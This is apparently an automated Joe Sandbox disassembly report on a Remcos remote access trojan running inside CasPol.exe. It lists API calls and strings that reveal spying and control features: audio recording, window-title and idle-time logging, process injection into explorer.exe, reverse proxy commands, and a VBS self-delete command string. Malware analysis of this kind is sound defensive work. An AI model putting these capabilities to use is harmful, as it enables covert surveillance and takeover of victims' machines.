                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                              • String ID:
                                                                              • API String ID: 161543041-0
                                                                              • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                              • Instruction ID: 6df0fc8d0da410edbfddc8482cd9dc810a80ebbb5b2f86b8c24a0bb33e3d08c7
                                                                              • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                              • Instruction Fuzzy Hash: 96317235500B00AFEB20AA35D845B5B73E5AF42355F15841FF849E7292DF39AC98CB1A
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 0041912D
                                                                              • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041915F
                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
                                                                              • Sleep.KERNEL32(000003E8), ref: 0041926D
                                                                              • GetLocalTime.KERNEL32(?), ref: 0041927C
                                                                              • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                              • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                              • API String ID: 489098229-65789007
                                                                              • Opcode ID: a5c1d764bf39c371298a04ac01b762bfb52ba0ef1762b25b6dae560fe2315d5b
                                                                              • Instruction ID: b922dce7c629cfc9b1bb11cb74a08c0e3353b39699bf4d86e46594d10c943285
                                                                              • Opcode Fuzzy Hash: a5c1d764bf39c371298a04ac01b762bfb52ba0ef1762b25b6dae560fe2315d5b
                                                                              • Instruction Fuzzy Hash: 33519F71A002449ACB14BBB5C856AFE7BA9AB55304F00407FF84AB71D2EF3C5E85C799
                                                                              APIs
                                                                                • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                                              • ExitProcess.KERNEL32 ref: 0040C832
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                              • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                              • API String ID: 1913171305-390638927
                                                                              • Opcode ID: 222c1658ba95736b802eee0df1c967450302ea47f021d80fb4b35919c33a7236
                                                                              • Instruction ID: a795a6540db69397e2c5d2b70f340dd787df27bacd58b350937fb1c0aad7b7c4
                                                                              • Opcode Fuzzy Hash: 222c1658ba95736b802eee0df1c967450302ea47f021d80fb4b35919c33a7236
                                                                              • Instruction Fuzzy Hash: A2416D329001185ACB14F762DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free
                                                                              • String ID:
                                                                              • API String ID: 269201875-0
                                                                              • Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                              • Instruction ID: 48066223020562dfe8895eb3edc0e70975ef38ab3c96fc6f1fb07286cb8ca08d
                                                                              • Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                              • Instruction Fuzzy Hash: 2BC15772D80204BFEB20DBA9CC82FDE77F89B45704F15416AFA04FB282D6749D458B58
                                                                              APIs
                                                                                • Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000,?,00454A2B,00000000,0000000C), ref: 0045466D
                                                                              • GetLastError.KERNEL32 ref: 00454A96
                                                                              • __dosmaperr.LIBCMT ref: 00454A9D
                                                                              • GetFileType.KERNEL32(00000000), ref: 00454AA9
                                                                              • GetLastError.KERNEL32 ref: 00454AB3
                                                                              • __dosmaperr.LIBCMT ref: 00454ABC
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00454ADC
                                                                              • CloseHandle.KERNEL32(?), ref: 00454C26
                                                                              • GetLastError.KERNEL32 ref: 00454C58
                                                                              • __dosmaperr.LIBCMT ref: 00454C5F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                              • String ID: H
                                                                              • API String ID: 4237864984-2852464175
                                                                              • Opcode ID: 6ee1e536fdc7f2f0b5cfdc99f6d3f503e334a2caa4375aff0222a5d39aa192cc
                                                                              • Instruction ID: 324c09394b40af715295ff654573b8bda7a64cd12b4111e7ce26936e53f9a861
                                                                              • Opcode Fuzzy Hash: 6ee1e536fdc7f2f0b5cfdc99f6d3f503e334a2caa4375aff0222a5d39aa192cc
                                                                              • Instruction Fuzzy Hash: B0A148329041044FDF19EF78D8427AE7BA0AB86319F14015EFC159F392DB398C86C75A
                                                                              APIs
                                                                              • __Init_thread_footer.LIBCMT ref: 0040A456
                                                                              • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                                              • GetForegroundWindow.USER32 ref: 0040A467
                                                                              • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                                              • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                                              • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                                                • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                              • String ID: [${ User has been idle for $ minutes }$]
                                                                              • API String ID: 911427763-3954389425
                                                                              • Opcode ID: 857cb8547fc0c7de63d47fafe1f939e9c3f12b23128d66a6f39a65a77907db43
                                                                              • Instruction ID: 0ecdfa35f4bf358d0b6072dbfc0ad8fc4f94b2a12b5a089c7f39fa9b67fb4d59
                                                                              • Opcode Fuzzy Hash: 857cb8547fc0c7de63d47fafe1f939e9c3f12b23128d66a6f39a65a77907db43
                                                                              • Instruction Fuzzy Hash: C451DF316083005BC614FB21D84AAAE7794BF84318F50493FF846A62E2EF7C9E55C69F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 65535$udp
                                                                              • API String ID: 0-1267037602
                                                                              • Opcode ID: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                              • Instruction ID: a76ad32841e4dbbb66723cf4e0556afe3febbbe66cdf8f55616d13ac9502c32b
                                                                              • Opcode Fuzzy Hash: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                              • Instruction Fuzzy Hash: 9D4118716083019BD7209F29E905BAB7BD8EF85706F04082FF84197391E76DCEC186AE
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393B9
                                                                              • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C6
                                                                              • __dosmaperr.LIBCMT ref: 004393CD
                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393F9
                                                                              • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439403
                                                                              • __dosmaperr.LIBCMT ref: 0043940A
                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043944D
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439457
                                                                              • __dosmaperr.LIBCMT ref: 0043945E
                                                                              • _free.LIBCMT ref: 0043946A
                                                                              • _free.LIBCMT ref: 00439471
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                              • String ID:
                                                                              • API String ID: 2441525078-0
                                                                              • Opcode ID: 7d52e2fbbdbfe11ab4c2d7ae9a425497261befc8dca55fd6b38b522b0d4b8486
                                                                              • Instruction ID: 902c93592471d116807dca9985149206a76c62e8192f2f9a6cc20a0486345b12
                                                                              • Opcode Fuzzy Hash: 7d52e2fbbdbfe11ab4c2d7ae9a425497261befc8dca55fd6b38b522b0d4b8486
                                                                              • Instruction Fuzzy Hash: F531F17140820ABBEF11AFA5DC449AF3B78EF09364F14016AF81066291DB79CC12DBA9
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Eventinet_ntoa
                                                                              • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G$
                                                                              • API String ID: 3578746661-2335409004
                                                                              • Opcode ID: 28a73e5b790fca0c7b272f7a4031ed656846135069b23c0b6c9381e5b925d934
                                                                              • Instruction ID: 9533851bb4e74ac183efc1d320b4a1154e984465ef7073577260c431c5a81f81
                                                                              • Opcode Fuzzy Hash: 28a73e5b790fca0c7b272f7a4031ed656846135069b23c0b6c9381e5b925d934
                                                                              • Instruction Fuzzy Hash: E8518471A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CAD85CB9F
                                                                              APIs
                                                                              • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                                              • TranslateMessage.USER32(?), ref: 00404F30
                                                                              • DispatchMessageA.USER32(?), ref: 00404F3B
                                                                              • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                                                              • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                              • String ID: CloseChat$DisplayMessage$GetMessage
                                                                              • API String ID: 2956720200-749203953
                                                                              • Opcode ID: 454db755f912fa01c8601e4ef7cf6467bd583855cf95526551994d62d0d02b8f
                                                                              • Instruction ID: a70547b48422ce96676d24762269450ce3f1821fc9982c67352fb5fd346d99ba
                                                                              • Opcode Fuzzy Hash: 454db755f912fa01c8601e4ef7cf6467bd583855cf95526551994d62d0d02b8f
                                                                              • Instruction Fuzzy Hash: F741BFB16043016BC714FB75DC5A8AE77A9ABC1714F40093EF906A31E6EF38DA05C79A
                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                                              • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                                              • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                              • String ID: <$@$@FG$@FG$Temp
                                                                              • API String ID: 1107811701-2245803885
                                                                              • Opcode ID: 9aa80993413a1b3ebcdc5bb8f2da99d78fddc9721480b20f30c3289c8ee1195b
                                                                              • Instruction ID: 21bac8b1790940aaec7d6d8591dec239f7d6dde33bc15b5890dc9a9e7f2861e5
                                                                              • Opcode Fuzzy Hash: 9aa80993413a1b3ebcdc5bb8f2da99d78fddc9721480b20f30c3289c8ee1195b
                                                                              • Instruction Fuzzy Hash: E8319C319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(00474A28,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                                              • GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 00406705
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CurrentProcess
                                                                              • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                                              • API String ID: 2050909247-4145329354
                                                                              • Opcode ID: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                              • Instruction ID: 423827b33d6c667fb1d0fc3afb55bdad30249121d517be796f0b9763ce16cf58
                                                                              • Opcode Fuzzy Hash: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                              • Instruction Fuzzy Hash: B2310871250700AFC300AB65EC45F6A37B8EB84716F11043EF50AE76E1EB79A8508B6D
                                                                              APIs
                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
                                                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                              • String ID:
                                                                              • API String ID: 221034970-0
                                                                              • Opcode ID: 3abd86868e1217ea2d45c9c88d919e3d4f56aa0647f23c1260161372d98c8da3
                                                                              • Instruction ID: aaf019a9b49167a30595a2ca3c371567d0eeee9026f0995440eeab6e66ec65be
                                                                              • Opcode Fuzzy Hash: 3abd86868e1217ea2d45c9c88d919e3d4f56aa0647f23c1260161372d98c8da3
                                                                              • Instruction Fuzzy Hash: 00118632901218AFD7116B64EC85DFF3FACDB45BA5B000036F502921D1DB64DD46AAF5
                                                                              APIs
                                                                              • _free.LIBCMT ref: 00446DDF
                                                                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                              • _free.LIBCMT ref: 00446DEB
                                                                              • _free.LIBCMT ref: 00446DF6
                                                                              • _free.LIBCMT ref: 00446E01
                                                                              • _free.LIBCMT ref: 00446E0C
                                                                              • _free.LIBCMT ref: 00446E17
                                                                              • _free.LIBCMT ref: 00446E22
                                                                              • _free.LIBCMT ref: 00446E2D
                                                                              • _free.LIBCMT ref: 00446E38
                                                                              • _free.LIBCMT ref: 00446E46
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 776569668-0
                                                                              • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                              • Instruction ID: b6db37451886405a3c03f61b360184b61b1678451e8b30ee63348233c964278a
                                                                              • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                              • Instruction Fuzzy Hash: F011E975100408BFEB01EF55C842CDD3B65EF46354B06C0AAF9086F222DA35DE649F85
                                                                              APIs
                                                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DAF), ref: 0045515C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DecodePointer
                                                                              • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                              • API String ID: 3527080286-3064271455
                                                                              • Opcode ID: ab61d69453e4831c81f6a46e39f254611e12c2bb616dca0b6d42b24218e76fcf
                                                                              • Instruction ID: 89d0c260ad138193cc60bb845925db7455dcb75d1c4d79333749f45855522aa5
                                                                              • Opcode Fuzzy Hash: ab61d69453e4831c81f6a46e39f254611e12c2bb616dca0b6d42b24218e76fcf
                                                                              • Instruction Fuzzy Hash: DA516D70900E09CBCF14DF99E9581BDBBB0FB09342F244297EC41A6266CB798A1DCB1D
                                                                              APIs
                                                                              • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                                                • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                              • Sleep.KERNEL32(00000064), ref: 00416688
                                                                              • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$CreateDeleteExecuteShellSleep
                                                                              • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                              • API String ID: 1462127192-2001430897
                                                                              • Opcode ID: 57a3d9700c363e16d92c0a35c53a2666f58ec185e1c8130573b5faa5b1b3f2e0
                                                                              • Instruction ID: 72b86f905f1643b809cd09d25b02ba286255726e8958c1b91c3bd62dba73c542
                                                                              • Opcode Fuzzy Hash: 57a3d9700c363e16d92c0a35c53a2666f58ec185e1c8130573b5faa5b1b3f2e0
                                                                              • Instruction Fuzzy Hash: FD313E719001085ADB14FBA1DC96EEE7764AF50708F00013FF906731E2EF786A8ACA9D
                                                                              APIs
                                                                              • _strftime.LIBCMT ref: 00401AD3
                                                                                • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                              • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                                              • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                                              • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                              • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                                              • API String ID: 3809562944-3643129801
                                                                              • Opcode ID: 4e4f26da87869f5af6422ea0e78c3964d23409c8ed5f67b7aa5e9f585ec7fe39
                                                                              • Instruction ID: ec6e8c75c27496dd15f6dcc160753dc5291fcfbcfc36b55cd818fae73feeac55
                                                                              • Opcode Fuzzy Hash: 4e4f26da87869f5af6422ea0e78c3964d23409c8ed5f67b7aa5e9f585ec7fe39
                                                                              • Instruction Fuzzy Hash: 6C317E315053009BC314EF25DC56A9E77E8BB94314F00883EF559A21F1EF78AA49CB9A
                                                                              APIs
                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                                              • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                                              • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                                              • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                                              • waveInStart.WINMM ref: 00401A81
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                              • String ID: XCG$`=G$x=G
                                                                              • API String ID: 1356121797-903574159
                                                                              • Opcode ID: af02e173f40945dc6bf52b4cf25fd682b2b0044d7a0dcd55ec314a43764efb73
                                                                              • Instruction ID: 1c4952ee711c82e1d68262a7885cb64ec938acb60d992cd4a46dee1db52e037b
                                                                              • Opcode Fuzzy Hash: af02e173f40945dc6bf52b4cf25fd682b2b0044d7a0dcd55ec314a43764efb73
                                                                              • Instruction Fuzzy Hash: 87215C316012009BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
                                                                                • Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                • Part of subcall function 0041CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                • Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91
                                                                              • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
                                                                              • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
                                                                              • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9EF
                                                                              • TranslateMessage.USER32(?), ref: 0041C9FB
                                                                              • DispatchMessageA.USER32(?), ref: 0041CA05
                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA12
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                              • String ID: Remcos
                                                                              • API String ID: 1970332568-165870891
                                                                              • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                              • Instruction ID: 0af2178feff80faf092f0d4c6bffee9b758878d1eb04e36c9ad6546aee081b39
                                                                              • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                              • Instruction Fuzzy Hash: 760121B1944344ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8724f9862cb7656745f569b65e9253ef66bccdbbb21ca01ab506061567e91e9c
                                                                              • Instruction ID: 1e235cce983953b2f50cc3566bc78ab2d8216d31b9fa4c429b6f00869d8f9d70
                                                                              • Opcode Fuzzy Hash: 8724f9862cb7656745f569b65e9253ef66bccdbbb21ca01ab506061567e91e9c
                                                                              • Instruction Fuzzy Hash: 27C1D774D04249AFEF11DFA9C8417AEBBB4FF4A304F14405AE814A7392C778D941CBA9
                                                                              APIs
                                                                              • GetCPInfo.KERNEL32(?,?), ref: 00452BD6
                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00452C59
                                                                              • __alloca_probe_16.LIBCMT ref: 00452C91
                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00452CEC
                                                                              • __alloca_probe_16.LIBCMT ref: 00452D3B
                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00452D03
                                                                                • Part of subcall function 00446AFF: HeapAlloc.KERNEL32(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00452D7F
                                                                              • __freea.LIBCMT ref: 00452DAA
                                                                              • __freea.LIBCMT ref: 00452DB6
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
